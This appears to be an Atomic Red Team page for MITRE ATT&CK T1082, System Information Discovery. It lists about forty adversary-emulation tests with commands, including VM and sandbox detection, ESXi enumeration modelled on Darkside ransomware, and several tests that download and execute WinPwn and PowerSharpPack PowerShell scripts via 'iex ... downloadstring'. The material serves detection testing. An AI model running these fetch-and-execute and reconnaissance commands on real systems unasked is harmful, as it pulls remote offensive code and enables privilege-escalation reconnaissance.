T1082
System Information Discovery
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use this information to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. This behavior is distinct from Local Storage Discovery which is an adversary's discovery of local drive, disks and/or volumes.
Tools such as Systeminfo can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. Adversaries may leverage a Network Device CLI on network devices to gather detailed system information (e.g. show version).(Citation: US-CERT-TA18-106A) On ESXi servers, threat actors may gather system information from various esxcli utilities, such as system hostname get and system version get.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: Varonis)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)
System Information Discovery combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)
Atomic Tests
-
Atomic Test #11 - Environment variables discovery on windows
-
Atomic Test #12 - Environment variables discovery on freebsd, macos and linux
-
Atomic Test #13 - Show System Integrity Protection status (MacOS)
-
Atomic Test #21 - WinPwn - PowerSharpPack - Watson searching for missing windows patches
-
Atomic Test #22 - WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors
-
Atomic Test #30 - BIOS Information Discovery through Registry
-
Atomic Test #32 - ESXi - Darkside system information discovery
-
Atomic Test #36 - Display volume shadow copies with "vssadmin"
-
Atomic Test #37 - Identify System Locale and Regional Settings with PowerShell
Atomic Test #1 - System Information Discovery
Identify System Info. Upon execution, system info and time info will be displayed.
Supported Platforms: Windows
auto_generated_guid: 66703791-c902-4560-8770-42b8a91f7667
Attack Commands: Run with command_prompt!
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\EnumAtomic Test #2 - System Information Discovery
Identify System Info
Supported Platforms: macOS
auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6
Attack Commands: Run with sh!
system_profiler
ls -al /ApplicationsAtomic Test #3 - List OS Information
Identify System Info
Supported Platforms: Linux, macOS
auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file used to store the results. | path | /tmp/T1082.txt |
Attack Commands: Run with sh!
uname -a >> #{output_file}
if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi
if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi
if [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi
if [ -f /etc/os-release ]; then cat /etc/os-release >> #{output_file}; fi
uptime >> #{output_file}
cat #{output_file} 2>/dev/nullCleanup Commands:
rm #{output_file} 2>/dev/nullAtomic Test #4 - Linux VM Check via Hardware
Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware.
Supported Platforms: Linux
auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi
if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi
if [ -f /sys/class/dmi/id/chassis_vendor ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi
if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"; fi
if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi
if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi
if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox"; fi
if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"; fiAtomic Test #5 - Linux VM Check via Kernel Modules
Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware.
Supported Platforms: Linux
auto_generated_guid: 8057d484-0fae-49a4-8302-4812c4f1e64e
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
sudo lsmod | grep -i "virtio_pci\|virtio_net"
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"Atomic Test #6 - FreeBSD VM Check via Kernel Modules
Identify virtual machine host kernel modules.
Supported Platforms: Linux
auto_generated_guid: eefe6a49-d88b-41d8-8fc2-b46822da90d3
Attack Commands: Run with sh!
kldstat | grep -i "vmm"
kldstat | grep -i "vbox"Atomic Test #7 - Hostname Discovery (Windows)
Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed.
Supported Platforms: Windows
auto_generated_guid: 85cfbf23-4a1e-4342-8792-007e004b975f
Attack Commands: Run with command_prompt!
hostnameAtomic Test #8 - Hostname Discovery
Identify system hostname for FreeBSD, Linux and macOS systems.
Supported Platforms: Linux, macOS
auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133
Attack Commands: Run with sh!
hostnameAtomic Test #9 - Windows MachineGUID Discovery
Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry.
Supported Platforms: Windows
auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8
Attack Commands: Run with command_prompt!
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuidAtomic Test #10 - Griffon Recon
This script emulates the reconnaissance script seen in used by Griffon and was modified by security researcher Kirk Sayre in order simply print the recon results to the screen as opposed to exfiltrating them. Script. For more information see also https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon and https://attack.mitre.org/software/S0417/
Supported Platforms: Windows
auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| vbscript | Path to sample script | string | PathToAtomicsFolder\T1082\src\griffon_recon.vbs |
Attack Commands: Run with powershell!
cscript "#{vbscript}"Dependencies: Run with powershell!
Description: Sample script file must exist on disk at specified location (#{vbscript})
Check Prereq Commands:
if (Test-Path "#{vbscript}") {exit 0} else {exit 1}Get Prereq Commands:
New-Item -Type Directory (split-path "#{vbscript}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs" -OutFile "#{vbscript}"Atomic Test #11 - Environment variables discovery on windows
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
Supported Platforms: Windows
auto_generated_guid: f400d1c0-1804-4ff8-b069-ef5ddd2adbf3
Attack Commands: Run with command_prompt!
setAtomic Test #12 - Environment variables discovery on freebsd, macos and linux
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
Supported Platforms: Linux, macOS
auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720
Attack Commands: Run with sh!
envAtomic Test #13 - Show System Integrity Protection status (MacOS)
Read and Display System Intergrety Protection status. csrutil is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not.
Supported Platforms: macOS
auto_generated_guid: 327cc050-9e99-4c8e-99b5-1d15f2fb6b96
Attack Commands: Run with sh!
csrutil statusAtomic Test #14 - WinPwn - winPEAS
Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn
Supported Platforms: Windows
auto_generated_guid: eea1d918-825e-47dd-acc2-814d6c58c0e1
Attack Commands: Run with powershell!
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
winPEAS -noninteractive -consoleoutputAtomic Test #15 - WinPwn - itm4nprivesc
Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn
Supported Platforms: Windows
auto_generated_guid: 3d256a2f-5e57-4003-8eb6-64d91b1da7ce
Attack Commands: Run with powershell!
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
itm4nprivesc -noninteractive -consoleoutputAtomic Test #16 - WinPwn - Powersploits privesc checks
Powersploits privesc checks using oldchecks function of WinPwn
Supported Platforms: Windows
auto_generated_guid: 345cb8e4-d2de-4011-a580-619cf5a9e2d7
Attack Commands: Run with powershell!
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
oldchecks -noninteractive -consoleoutputCleanup Commands:
rm -force -recurse .\DomainRecon -ErrorAction Ignore
rm -force -recurse .\Exploitation -ErrorAction Ignore
rm -force -recurse .\LocalPrivEsc -ErrorAction Ignore
rm -force -recurse .\LocalRecon -ErrorAction Ignore
rm -force -recurse .\Vulnerabilities -ErrorAction IgnoreAtomic Test #17 - WinPwn - General privesc checks
General privesc checks using the otherchecks function of WinPwn
Supported Platforms: Windows
auto_generated_guid: 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed
Attack Commands: Run with powershell!
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
otherchecks -noninteractive -consoleoutputAtomic Test #18 - WinPwn - GeneralRecon
Collect general computer informations via GeneralRecon function of WinPwn
Supported Platforms: Windows
auto_generated_guid: 7804659b-fdbf-4cf6-b06a-c03e758590e8
Attack Commands: Run with powershell!
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Generalrecon -consoleoutput -noninteractiveAtomic Test #19 - WinPwn - Morerecon
Gathers local system information using the Morerecon function of WinPwn
Supported Platforms: Windows
auto_generated_guid: 3278b2f6-f733-4875-9ef4-bfed34244f0a
Attack Commands: Run with powershell!
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Morerecon -noninteractive -consoleoutputAtomic Test #20 - WinPwn - RBCD-Check
Search for Resource-Based Constrained Delegation attack paths using RBCD-Check function of WinPwn
Supported Platforms: Windows
auto_generated_guid: dec6a0d8-bcaf-4c22-9d48-2aee59fb692b
Attack Commands: Run with powershell!
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
RBCD-Check -consoleoutput -noninteractiveAtomic Test #21 - WinPwn - PowerSharpPack - Watson searching for missing windows patches
PowerSharpPack - Watson searching for missing windows patches technique via function of WinPwn
Supported Platforms: Windows
auto_generated_guid: 07b18a66-6304-47d2-bad0-ef421eb2e107
Attack Commands: Run with powershell!
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
Invoke-watsonAtomic Test #22 - WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors
PowerSharpPack - Sharpup checking common Privesc vectors technique via function of WinPwn - Takes several minutes to complete.
Supported Platforms: Windows
auto_generated_guid: efb79454-1101-4224-a4d0-30c9c8b29ffc
Attack Commands: Run with powershell!
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
Invoke-SharpUp -command "audit"Atomic Test #23 - WinPwn - PowerSharpPack - Seatbelt
PowerSharpPack - Seatbelt technique via function of WinPwn.
Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
Supported Platforms: Windows
auto_generated_guid: 5c16ceb4-ba3a-43d7-b848-a13c1f216d95
Attack Commands: Run with powershell!
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
Invoke-Seatbelt -Command "-group=all"Atomic Test #24 - Azure Security Scan with SkyArk
Upon successful execution, this test will utilize a valid read-only Azure AD user's credentials to conduct a security scan and determine what users exist in a given tenant, as well as identify any admin users. Once the test is complete, a folder will be output to the temp directory that contains 3 csv files which provide info on the discovered users. See https://github.com/cyberark/SkyArk
Supported Platforms: Azure-ad
auto_generated_guid: 26a18d3d-f8bc-486b-9a33-d6df5d78a594
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Azure AD username | string | |
| password | Azure AD password | string | T1082Az |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1" -force
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-AzAccount -Credential $Credential
Connect-AzureAD -Credential $Credential
Scan-AzureAdmins -UseCurrentCredCleanup Commands:
$resultstime = Get-Date -Format "yyyyMMdd"
$resultsfolder = ("Results-" + $resultstime)
remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinueDependencies: Run with powershell!
Description: The SkyArk AzureStealth module must exist in PathToAtomicsFolder..\ExternalPayloads.
Check Prereq Commands:
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1"){exit 0} else {exit 1}Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1"Description: The AzureAD module must be installed.
Check Prereq Commands:
try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}Get Prereq Commands:
Install-Module -Name AzureAD -ForceDescription: The Az module must be installed.
Check Prereq Commands:
try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}Get Prereq Commands:
Install-Module -Name Az -ForceAtomic Test #25 - Linux List Kernel Modules
Enumerate kernel modules installed 3 different ways. Upon successful execution stdout will display kernel modules installed on host 2 times, followed by list of modules matching 'vmw' if present.
Supported Platforms: Linux
auto_generated_guid: 034fe21c-3186-49dd-8d5d-128b35f181c7
Attack Commands: Run with sh!
lsmod
kmod list
grep vmw /proc/modulesAtomic Test #26 - FreeBSD List Kernel Modules
Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.
Supported Platforms: Linux
auto_generated_guid: 4947897f-643a-4b75-b3f5-bed6885749f6
Attack Commands: Run with sh!
kldstat
kldstat | grep vmmAtomic Test #27 - System Information Discovery with WMIC
Identify system information with the WMI command-line (WMIC) utility. Upon execution, various system information will be displayed, including: OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. https://nwgat.ninja/getting-system-information-with-wmic-on-windows/ Elements of this test were observed in the wild used by Aurora Stealer in late 2022 and early 2023, as highlighted in public reporting: https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/
Supported Platforms: Windows
auto_generated_guid: 8851b73a-3624-4bf7-8704-aa312411565c
Attack Commands: Run with command_prompt!
wmic cpu get name
wmic MEMPHYSICAL get MaxCapacity
wmic baseboard get product
wmic baseboard get version
wmic bios get SMBIOSBIOSVersion
wmic path win32_VideoController get name
wmic path win32_VideoController get DriverVersion
wmic path win32_VideoController get VideoModeDescription
wmic OS get Caption,OSArchitecture,Version
wmic DISKDRIVE get Caption
Get-WmiObject win32_biosAtomic Test #28 - System Information Discovery
The script gathernetworkinfo.vbs is employed to collect system information such as the operating system, DNS details, firewall configuration, etc. Outputs are stored in c:\Windows\System32\config or c:\Windows\System32\reg. https://www.verboon.info/2011/06/the-gathernetworkinfo-vbs-script/
Supported Platforms: Windows
auto_generated_guid: 4060ee98-01ae-4c8e-8aad-af8300519cc7
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
wscript.exe C:\Windows\System32\gatherNetworkInfo.vbsAtomic Test #29 - Check computer location
Looks up country code configured in the registry, likely geofence. Upon execution, country code info will be displayed.
Supported Platforms: Windows
auto_generated_guid: 96be6002-9200-47db-94cb-c3e27de1cb36
Attack Commands: Run with command_prompt!
reg query "HKEY_CURRENT_USER\Control Panel\International\Geo"Atomic Test #30 - BIOS Information Discovery through Registry
Looks up for BIOS information in the registry. BIOS information is often read in order to detect sandboxing environments. Upon execution, BIOS information will be displayed.
- https://tria.ge/210111-eaz8mqhgh6/behavioral1
- https://evasions.checkpoint.com/techniques/registry.html
Supported Platforms: Windows
auto_generated_guid: f2f91612-d904-49d7-87c2-6c165d23bead
Attack Commands: Run with command_prompt!
reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v SystemBiosVersion
reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v VideoBiosVersionAtomic Test #31 - ESXi - VM Discovery using ESXCLI
An adversary will using ESXCLI to enumerate the Virtual Machines on the host prior to executing power off routine. Reference
Supported Platforms: Windows
auto_generated_guid: 2040405c-eea6-4c1c-aef3-c2acc430fac9
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| vm_host | Specify the host name or IP of the ESXi Server | string | atomic.local |
| vm_user | Specify the privilege user account on ESXi Server | string | root |
| vm_pass | Specify the privilege user password on ESXi Server | string | pass |
| plink_file | Path to Plink | path | PathToAtomicsFolder\..\ExternalPayloads\plink.exe |
| cli_script | Path to file with discovery commands | path | PathToAtomicsFolder\T1082\src\esx_vmdiscovery.txt |
Attack Commands: Run with command_prompt!
echo "" | "#{plink_file}" "#{vm_host}" -ssh -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"Dependencies: Run with powershell!
Description: Check if plink is available.
Check Prereq Commands:
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"Atomic Test #32 - ESXi - Darkside system information discovery
Darkside ransomware utilises various ESXCLI commands to obtain information about the ESXi Host. Reference
Supported Platforms: Windows
auto_generated_guid: f89812e5-67d1-4f49-86fa-cbc6609ea86a
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| vm_host | Specify the host name or IP of the ESXi Server | string | atomic.local |
| vm_user | Specify the privilege user account on ESXi Server | string | root |
| vm_pass | Specify the privilege user password on ESXi Server | string | pass |
| plink_file | Path to Plink | path | PathToAtomicsFolder\..\ExternalPayloads\plink.exe |
| cli_script | Path to file containing darkside ransomware discovery commands | path | PathToAtomicsFolder\T1082\src\esx_darkside_discovery.txt |
Attack Commands: Run with command_prompt!
echo "" | "#{plink_file}" "#{vm_host}" -ssh -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"Dependencies: Run with powershell!
Description: Check if plink is available.
Check Prereq Commands:
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"Atomic Test #33 - sysctl to gather macOS hardware info
Gets the macOS hardware information, which can be used to determine whether the target macOS host is running on a physical or virtual machine. sysctl can be used to gather interesting macOS host data, including hardware information, memory size, logical cpu information, etc.
Supported Platforms: macOS
auto_generated_guid: c8d40da9-31bd-47da-a497-11ea55d1ef6c
Attack Commands: Run with sh!
sysctl -n hw.modelAtomic Test #34 - operating system discovery
operating system discovery using get-ciminstance https://petri.com/getting-operating-system-information-powershell/
Supported Platforms: Windows
auto_generated_guid: 70e13ef4-5a74-47e4-9d16-760b41b0e2db
Attack Commands: Run with powershell!
Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version, ServicePackMajorVersion, OSArchitecture, CSName, WindowsDirectory | Out-nullAtomic Test #35 - Check OS version via "ver" command
Ver command shows information about os version.
Supported Platforms: Windows
auto_generated_guid: f6ecb109-df24-4303-8d85-1987dbae6160
Attack Commands: Run with command_prompt!
verAtomic Test #36 - Display volume shadow copies with "vssadmin"
The command shows all available volume shadow copies, along with their creation time and location.
Supported Platforms: Windows
auto_generated_guid: 7161b085-816a-491f-bab4-d68e974b7995
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
vssadmin.exe list shadowsAtomic Test #37 - Identify System Locale and Regional Settings with PowerShell
This action demonstrates how an attacker might gather a system's region and language settings using PowerShell, which could aid in profiling the machine's location and user language preferences. The command outputs system locale details to a temporary file for further analysis.
Supported Platforms: Windows
auto_generated_guid: ce479c1a-e8fa-42b2-812a-96b0f2f4d28a
Attack Commands: Run with command_prompt!
powershell.exe -c "Get-Culture | Format-List | Out-File -FilePath %TMP%\a.txt"Cleanup Commands:
cmd.exe /c del "%TMP%\a.txt"Atomic Test #38 - Enumerate Available Drives via gdr
This test simulates an attacker attempting to list the available drives on the system to gather data about file storage locations.
Supported Platforms: Windows
auto_generated_guid: c187c9bc-4511-40b3-aa10-487b2c70b6a5
Attack Commands: Run with command_prompt!
powershell.exe -c "gdr -PSProvider 'FileSystem'"Atomic Test #39 - Discover OS Product Name via Registry
Identify the Operating System Product Name via registry with the reg.exe command. Upon execution, the OS Product Name will be displayed.
Supported Platforms: Windows
auto_generated_guid: be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7
Attack Commands: Run with command_prompt!
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductNameAtomic Test #40 - Discover OS Build Number via Registry
Identify the Operating System Build Number via registry with the reg.exe command. Upon execution, the OS Build Number will be displayed.
Supported Platforms: Windows
auto_generated_guid: acfcd709-0013-4f1e-b9ee-bc1e7bafaaec
Attack Commands: Run with command_prompt!
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v CurrentBuildNumber